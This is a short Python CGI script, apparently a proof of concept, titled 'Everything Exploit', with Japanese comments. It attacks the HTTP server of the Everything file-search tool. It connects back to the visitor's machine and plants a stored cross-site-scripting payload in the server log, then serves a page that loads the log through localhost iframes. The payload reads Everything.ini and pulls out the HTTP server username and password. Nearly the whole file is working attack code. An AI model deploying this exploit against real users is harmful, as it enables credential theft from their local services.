#!/usr/bin/python
# coding: utf-8

import cgi,cgitb,os,socket

payload = r"""
!function(){
	if(typeof attacked!="undefined")
		return;
	function attack(url){
		var x=XMLHttpRequest?(new XMLHttpRequest()):(new ActiveXObject('MSXML2.XMLHTTP.6.0'));
		x.open("GET",url);
		x.onreadystatechange=function(){
			if(x.readyState==4&&x.status==200){
				var t=x.responseText;
				alert(
					t.match(/http_server_username=.*/)+"\n"+
					t.match(/http_server_password=.*/));
			}
		};
		x.send();
	}
	attack("/C%3A/Program%20Files%20(x86)/Everything/Everything.ini");
	attack("/C%3A/Program%20Files/Everything/Everything.ini");
	attacked = true;
}();"""

# payloadをログに書けるように変換
payload = payload.replace("\n","")      # 改行を削除
payload = payload.replace("\t","")      # タブを削除
payload = payload.replace("\\",r"\\")   # \ → \\
payload = payload.replace(" ",r"\x20")  # " " → \x20
payload = payload.replace('"',r'\"')    # " → \"
payload = '<script>eval("%s");</script>'%payload

# 逆接続してログに書き込む
try:
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.settimeout(10.)
    s.connect((os.environ["REMOTE_ADDR"],80))
    s.sendall("GET /%s HTTP/1.0\r\n\r\n"%payload)
    s.recv(0x10000)
except:
    pass

# ログファイルを読み込むHTMLを出力
print r"""Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html>
  <head>
    <title>Everything Exploit</title>
  </head>
  <body>
    <h1>Everything Exploit</h1>
    <div>
      <iframe src="http://localhost/C%3A/Program%20Files%20(x86)/Everything/Logs/HTTP_Server_Log.txt"></iframe>
      <iframe src="http://localhost/C%3A/Program%20Files/Everything/Logs/HTTP_Server_Log.txt"></iframe>
    </div>
  </body>
</html>
"""